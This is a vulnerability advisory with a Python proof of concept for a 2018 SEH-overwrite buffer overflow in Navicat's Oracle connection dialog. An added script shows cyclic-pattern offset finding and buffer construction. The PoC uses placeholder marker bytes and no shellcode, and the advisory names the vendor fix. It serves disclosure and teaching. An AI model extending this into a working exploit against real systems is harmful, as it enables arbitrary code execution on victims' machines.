Vendor: Navicat
By: Kevin McGuigan
CVSS: 7.8 (HIGH)
Vulnerability Type: Buffer Overflow
CWE: 119
Product Name: Navicat
Affected Version From: 12.0.26
Affected Version To: 12.0.27
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 32-bit
Year: 2018

Navicat < 12.0.27 Oracle Connection Overflow

Navicat before 12.0.27 is vulnerable to a buffer overflow when a user creates a new Oracle connection, pastes a specially crafted string into the host field and tests the connection. The proof of concept below overwrites the structured exception handler record (the nSEH pointer and the SEH handler address) with attacker-controlled bytes, which is what makes the bug exploitable for arbitrary code execution rather than a plain crash. Triggering it requires a user to paste the string into the connection dialog, so the attacker needs local access or a user who can be talked into doing so.

Mitigation:

Upgrade to Navicat 12.0.27 or later, which contains the vendor's fix (the vendor was notified on 04/04/2018 and issued the patch on 25/04/2018).

Exploit-DB raw data:

#!/usr/bin/python
# Title: Navicat < 12.0.27 Oracle Connection Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.navicat.com
# Date: 27/04/2018
# Version: 12.0.26
# Tested on Windows 7 32-bit
# Vendor notified on 04/04/2018. Patch issued on 25/04/2018.

# Usage: run this script to generate the file, then in Navicat choose
# Create new Oracle Connection, paste the contents of "navicatPOC.txt"
# into the host field and click Test Connection to trigger the overflow.
filename = "navicatPOC.txt"
junk = "A" * 1502            # padding up to the SEH record (offset found by the author)
#nseh = "\x4C\x4C\x77\x04"   # author's commented-out next-SEH bytes (left as in the original)
#seh= "\x75\x2a\x01\x10"     # author's commented-out handler address (little-endian)
nseh = "B" * 4               # overwrites the next-SEH pointer; "BBBB" is easy to spot in a debugger
seh = "C" * 4                # overwrites the exception-handler pointer; shows up as "CCCC"
fill = "D" * 4000            # filler after the handler so the overflow keeps going and an
                             # exception is raised, which invokes the overwritten handler
buffer = junk + nseh + seh + fill
with open(filename, "w") as textfile:
    textfile.write(buffer)
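The 1502-byte offset used by the PoC above is the kind of value found by sending a non-repeating cyclic pattern instead of "A"s, reading the four bytes that land in the nSEH and SEH slots in the debugger, and looking them up in the pattern. The script below, added here as an example and not part of Kevin McGuigan's exploit or the Exploit-DB entry, re-implements that workflow in Python: a Metasploit-style pattern_create/pattern_offset pair (my own implementation of the Aa0Aa1... scheme, not Metasploit's code), the same junk/nSEH/SEH/fill layout the PoC uses, and a helper that writes the file. The offset 1502 and the 4000-byte fill are taken from the PoC; the function names, the file name navicat_pattern.txt and the sample crash value are my own choices and are constructed for illustration.

```python
#!/usr/bin/env python3
"""Cyclic-pattern offset finding and SEH buffer layout (added example, not the original PoC)."""
import itertools
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Return `length` bytes of the Aa0Aa1Aa2... pattern; every 4-byte window is unique."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_UNIQUE)
    chunks = []
    for u, l, d in itertools.product(UPPER, LOWER, DIGITS):
        chunks.append(u + l + d)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length].encode("ascii")


def dword_at(data, offset):
    """Little-endian DWORD at `offset`, i.e. what a 32-bit debugger shows for those 4 bytes."""
    return struct.unpack("<I", data[offset:offset + 4])[0]


def pattern_offset(value, length=MAX_UNIQUE):
    """Offset of `value` inside the pattern, or -1.

    `value` may be the 4 raw bytes, or the DWORD as displayed by the debugger
    (e.g. nSEH = 0x41336141), which is unpacked little-endian back into bytes.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    return pattern_create(length).find(needle)


def build_seh_buffer(offset, nseh, seh, fill_len=4000, fill=b"D"):
    """Same layout as the PoC: junk up to the SEH record, 4-byte nSEH, 4-byte SEH, filler."""
    if len(nseh) != 4 or len(seh) != 4:
        raise ValueError("nSEH and SEH must each be exactly 4 bytes on 32-bit Windows")
    return b"A" * offset + nseh + seh + fill * fill_len


def write_poc(path, data):
    """Write the buffer as raw bytes so no newline or encoding translation alters it."""
    with open(path, "wb") as f:
        f.write(data)
    return len(data)


if __name__ == "__main__":
    # Step 1: generate a pattern long enough to cover the PoC's 5510-byte buffer and paste it
    # into the host field; the debugger then shows which pattern bytes hit nSEH/SEH.
    write_poc("navicat_pattern.txt", pattern_create(6000))
    # Step 2 (constructed sample): suppose the SEH chain view shows nSEH = 0x31794230.
    crash_nseh = 0x31794230
    off = pattern_offset(crash_nseh)
    print("nSEH overwritten at offset", off)
    # Step 3: rebuild the buffer with marker bytes at the discovered offset, as the PoC does.
    buf = build_seh_buffer(off, b"B" * 4, b"C" * 4)
    write_poc("navicatPOC.txt", buf)
```

The constructed crash value 0x31794230 is simply the DWORD the pattern places at offset 1502, chosen so the example reproduces the PoC's offset; on a real target the value comes from the debugger's SEH chain view. Keeping the pattern under 20280 bytes matters: beyond that the 4-byte windows repeat and the offset lookup becomes ambiguous.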